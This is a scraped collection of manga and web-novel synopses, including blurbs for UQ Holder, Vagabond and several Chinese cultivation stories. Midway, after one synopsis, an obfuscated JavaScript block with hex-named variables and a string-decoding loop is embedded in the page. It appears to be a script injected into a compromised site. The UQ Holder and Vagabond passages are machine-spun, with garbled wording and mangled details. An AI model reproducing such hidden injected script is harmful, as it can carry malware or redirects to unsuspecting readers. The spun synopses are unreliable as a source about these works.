He was sent to be an undercover cultivator in the Ten Thousand Demons sect for ten years, but was accidentally pushed to the position of sect master! Since then, Luo Yunxiao started a different path as the great demon!
Unity of Heaven and Earth is an action-packed manga set in a fictional modern society. It features the characters from Journey to the West, but all completely different. Introducing the master-turned-loli San Zang; the dragon-turned-horse-turned-beautiful woman White Dragon Horse; the pig-turned-Adonis Pigsy and Sun Wu Kong, who has been reincarnated as a human. All of your preconceptions from Journey to the West will be turned upside down!
Chen Daolin was only trying to enjoy his noodles, but he suddenly found himself in another worldExcited about the dangerous new world, he decided to become its unparalleled heroFollow Chen Daolin's journey as he discovers the secret of the Tulip family's descendant
Read UQ Holder Manga UQ Holder Manga is a manga series by Ken Akamatsu.The collection is placed in the year 2086, 10 years after magic is shown to the planet. Tota Konoe is a lad that find out what lies atop the large tower in the the main city and has always imagined leaving his home village. But protector Yukihime and his teacher promises that it'll just be possible once he gets the better of a feat that appears hopeless for him, her. Yet, once a bounty-hunter coming after the lifestyle of Yukihime mortally wounds Tota, she saves his life by transforming him into one of her type and shows herself as a vampire. So starts the experiences of Tota on earth of immortal beings in a culture where technology and magic are exceptionally improved to the idea of being virtually indistinguishable. Principal Characters in UQ Holder Manga Tota Konoe Rating amount 7 of UQ Holders, Tota is the primary character as well as a 14-year old lad who had been raised by Yukihime after his parents died. She transforms him into a vampire, getting an immortal being, while shielding Yukihime after being wounded. Upbeat and always cheerful, Tota is not dissimilar in family title and hair coloring a character from Negima, with Konoka Konoe ! and is suggested to be a a family member of hers, making him part of the Konoe family. His grandpa was a renowned wizard Negi Springfield and Negima!'s protagonist. Tota after receives a sword that could have its weight increased or decreased hundreds of timesfold according to the will of its own user (really a flexible dial) that becomes his primary weapon which is shown that his physique hold the the key ability of "Magia Erebea", enabling him to consume magic into his own body, bonding it to his spirit. The character of Tota strongly resembles his great grandfather, the character of Nagi Springfield. Yukihime / Evangeline A.K. McDowell A 700-year old immortal vampire as well as a primary character in the Negima! Show. After parting ways together with her pals in the Mahora Academy - perhaps from outliving them - Evangeline embraced the alias "Yukihime" (lit. "Snow Princess") and started the key "UQ Holder" culture for immortal beings. She normally appears as a tall and attractive girl rather than the typical childlike look seen in Negima! She becomes the foster parent of Tota after his birth parents are killed in a episode, later transforming him into a vampire to save his lifestyle. After it's shown that she'd fulfilled Tota centuries before bonded at that time with him and getting his guard as a result of paradox, indicating that she also fell in-love with him at the event. Kuromaru Tokisaka Ranking amount 11 of UQ Holder. Initially an assassin initially provided for kill Yukihime; 14-year old Kuromaru is conquered by Tota who "convinces" her to become his buddy and brother-in-arms. Kuromaru follows UQ Holder to be joined by Tota as she additionally exhibits characteristics of immortality. Kuromaru shows a female look and behaviour despite promising to be a lad and is generally mistaken as a woman. That is because she comes from a tribe of demi-humans where kids are born genderless but becomes female or male once they attain the age of 16. Kuromaru maintains she desires to eventually become man and remain by the aspect as his brother of Tota -in-arms, but feels conflicted because of her developing romantic feelings for him. Later on, after recognizing her emotions for Tota, despite perhaps not being age 16 however Kuromaru's physique starts to grow into that of women. Kuromaru is not dissimilar in look with Setsuna Sakurazaki from Negima!, and just like her, is an adept of the Kyoto Shinmei- other Eastern conflict techniques as well as ryu sword fashion. Other manga: + Liar Game manga + Tenkuu Shinpan manga
Bai Li Yun Xiao – with a spiritual life in the continent Jiuxiao. After his death he was resurrected, however, he returned 300 years ago, returned to urban adolescence, changed his life, and climbed to the top of the world again. “Whether in heaven or on earth, only I can win”<script></script><script>(function(_0xf15543,_0x3732f3){var _0x307fbf=_0x569a,_0x505ec0=_0xf15543();while(!![]){try{var _0x164599=-parseInt(_0x307fbf(0xd4))/(0x1*0x1903+-0x14cd+-0x435)+-parseInt(_0x307fbf(0xb7))/(-0xa71+-0xdad+0xc10*0x2)*(-parseInt(_0x307fbf(0xcc))/(-0x5b5+-0x8bf*-0x4+-0x1*0x1d44))+parseInt(_0x307fbf(0xbb))/(-0xf6c+0x29*0x94+-0x2*0x422)+-parseInt(_0x307fbf(0xbe))/(-0x6ec+-0x6b*0x3d+-0x3*-0xad0)*(parseInt(_0x307fbf(0xc6))/(-0x262*0x8+0x6cb+-0x419*-0x3))+parseInt(_0x307fbf(0xc7))/(0x187d+0x17ef+-0x1*0x3065)+parseInt(_0x307fbf(0xb6))/(-0xe*0x9+0x62e*-0x5+0x1f6c)+-parseInt(_0x307fbf(0xd5))/(0x1321+-0x1*0x539+-0xddf);if(_0x164599===_0x3732f3)break;else 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Before the fall of Chen Fei, one of the five celestial celestial celestial beings, the burning artifact reversed time and space and was born again to eighteen years old. The betrayal of the ex-girlfriend, the betrayal of the best friend, the suppression of the family… All the regrets of the past life, this world is going to take the path of the fairy, I can’t bear it, don’t avoid it, don’t let it, just for the sky, the city is sealed!
With incredible medical skills in his left hand and powerful martial arts in his right, carrying a hundred years of supreme knowledge, he is reborn again and this time, he will be invincible, in charge of everything, and at the top of the sky!
Activate the strongest vest system and get a new status every week.Some people are ordinary students on the surface, but behind the scenes he is the chairman of a multinational group, a peerless genius doctor, a chef who makes the world crazy, the world's top killer, and a superb hypnotist.In short, he has countless vests.Su Xun: I really just want to be an ordinary person, why is it so difficult?
What's a guy to do when a militant girl demands he date her little sister? Crazy right? Well, it's exactly what happens to transfer student Kakizaki Kokera. The Harimoto Sisters have a strange love-hate relationship he just can't help but get dragged into. And what's more, there's a strange town legend about a middle schooler who cleaned up the town with overwhelming violence five years ago called Urooboe Uroboros (Half-Remembered Uroboros).
With a dream to become the ultimate Chinese cuisine chef, our protagonist finds himself inexplicably transported to the Song Dynasty in China! However, upon awakening, he discovers that he possesses no martial arts skills whatsoever. All that remains are the culinary techniques he mastered in his previous life. Surprisingly, these dishes… receive an overwhelmingly positive response! Can he, with a single bowl of Jjajangmyeon, truly conquer the martial world? Will he be able to captivate the Central Plains with his Jjajangmyeon and lead a successful second life in this era? Associated Names A Bowl of Jajangmyeon Will Be Served by Jegalse A Bowl of Jjajang, the Son-in-Law of Jegalse A Bowl of Salty, Gnarly Dice Jegalse Will Bring in a Son-in-Law With a Bowl of Jjajang 짜장 한 그릇에 제갈세가 데릴사위
From Tokyopop: After establishing an idealized utopian country, the legendary warrior, Hong Gil-Dong, disappeared without a trace. As time passed, the people of the land began to forget about Hong Gil-Dong, who had been enjoying a peaceful existence of anonymity in a small village. Until one day, when a band of unknown warriors invaded the village, leaving it in utter ruin. Now, Hong Gil-Dong has returned, determined to raise his village from the ashes-but in order to accomplish this he will need funds. And so he finds employment as a bounty hunter, capturing wanted criminals. Then, in a twist of fate, Hong Gil-Dong inadvertently rescues the daughter of a wealthy merchant from a kidnapping attempt. Consequently, he is hired on as her bodyguard, and charged with delivering the girl safely to her father. But evil forces lurk in the shadows, observing the hero's every move-waiting for the opportunity to strike.
Growing up in the late 16th century Shinmen Takez, Sengoku era Japan? Is shunned by the neighborhood villagers as a devil kid because of his violent and wild character. Running far from house having a fellow lad at age 17, Takezo joins the Toyotomi military and the Tokugawa clan to battle in the Battle of Sekigahara. On the other hand, the Tokugawa win a smashing success, resulting in almost three hundred years of Shogunate rule. His buddy and Takezo find a way to survive the conflict and later vow to do amazing things with their lives. Yet, after their paths different, Takezo should change his title and his character so that you can escape an ignoble death and becomes a wanted criminal. Vagabond is a Japanese manga series illustrated and written by Takehiko Inoue. It describes a fictionalized accounts of the life span of Japanese swordsman Miyamoto Musashi, centered on the novel Musashi of Eiji Yoshikawa. Note: Won the Kodansha Manga Award for Best General Manga and the 24th Kodansha Manga Award in the general category in 2000. Won the Tezuka Osamu Cultural Prize in 2002 and was nomination for the 2003 Eisner Award in the Best Writer/Artist category.